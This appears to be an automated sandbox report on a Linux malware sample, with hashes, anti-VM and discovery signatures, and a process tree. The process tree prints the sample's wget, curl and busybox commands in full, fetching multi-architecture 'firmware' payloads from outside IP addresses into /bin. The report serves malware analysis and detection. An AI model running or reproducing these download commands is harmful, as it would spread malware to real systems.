63ed3ae9fbe52205481491ee6b3cdd01bef9edb6b7e8ae13f3b3199689908b5d

Analysis

max time kernel
119s
max time network
135s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
08/09/2024, 04:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

926ece3399a41d9fb928bb9d71b50c40N
Size

8KB
MD5

926ece3399a41d9fb928bb9d71b50c40
SHA1

7314e73f1ea04d26c35c2cd279c78fa2fd969426
SHA256

63ed3ae9fbe52205481491ee6b3cdd01bef9edb6b7e8ae13f3b3199689908b5d
SHA512

9116b0e52d11faa3f919e7106ae93e4d91a2388f6e2226ebf036791a6463da66dc686bd0d9c36936387e2042490fb6aab90162c6e0de1093dc99b9d24eee8b31
SSDEEP

96:RE+blp1FvijcbZoLat0PWP7GqSYJ0HojP:RE+P1FvijcbZoLat0PWP7GqSu

Score

6^/10

antivm discovery

Malware Config

Signatures

Writes file to system bin folder 20 IoCs

description	ioc	Process
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/current_user2	926ece3399a41d9fb928bb9d71b50c40N
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	926ece3399a41d9fb928bb9d71b50c40N
File opened for modification	/bin/ALLAH_IS_EVIL.txt	926ece3399a41d9fb928bb9d71b50c40N
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/allah_is_satan	926ece3399a41d9fb928bb9d71b50c40N
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget
File opened for modification	/bin/oaafkrbtil	wget

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 33 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl

/tmp/926ece3399a41d9fb928bb9d71b50c40N
/tmp/926ece3399a41d9fb928bb9d71b50c40N
1⤵
- Writes file to system bin folder
PID:641
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:644
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:645
- /usr/bin/whoami
  whoami
  2⤵
  PID:652
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:654
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:667
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:675
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:707
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:749
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:755
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:756
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:757
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:760
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:761
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mipsel -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:762
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.powerpc -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:768
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sh4 -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:769
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sparc -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:771
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:774
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arc -O oaafkrbtil
  2⤵
  - Writes file to system bin folder
  PID:775
- /bin/rm
  rm ff0
  2⤵
  PID:776
- /bin/rm
  rm ff1
  2⤵
  PID:777
- /bin/rm
  rm ff2
  2⤵
  PID:778
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.x86_64 -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:779
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv4l -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:782
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv5l -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:783
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv6l -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:784
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv7l -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:785
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i586 -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:788
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i686 -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:789
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.m68k -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:790
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mips -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:793
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mipsel -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:794
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.powerpc -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:795
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sh4 -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:798
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sparc -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:799
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:800
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arc -o oaafkrbtil
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:802
- /bin/rm
  rm ff0
  2⤵
  PID:804
- /bin/rm
  rm ff1
  2⤵
  PID:805
- /bin/rm
  rm ff2
  2⤵
  PID:806
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.x86_64 -O oaafkrbtil
  2⤵
  PID:807
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv4l -O oaafkrbtil
  2⤵
  PID:808
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv5l -O oaafkrbtil
  2⤵
  PID:809
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv6l -O oaafkrbtil
  2⤵
  PID:812
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv7l -O oaafkrbtil
  2⤵
  PID:813
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i586 -O oaafkrbtil
  2⤵
  PID:814
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i686 -O oaafkrbtil
  2⤵
  PID:817
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.m68k -O oaafkrbtil
  2⤵
  PID:818
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mips -O oaafkrbtil
  2⤵
  PID:819

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/bin/oaafkrbtil

Filesize
11B

MD5
1fea3fdda953ff9ede16d5525ad588b1

SHA1
ee20d24443c8b3325262cd3571b54851137bde0a

SHA256
802579c14707be1db0fb75dbbfcaa6f6f49ad63439a6f4b0a4d89f07f9cbe3b7

SHA512
cb3a87c1ff6ca5b2099d68cf3986afd5a758335af45a7aabdd64ea91bce2e095e54e4ddf21d5134e0fda718b02dbaefaab7c2cb79f04fd0d274315cd76167dc1

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads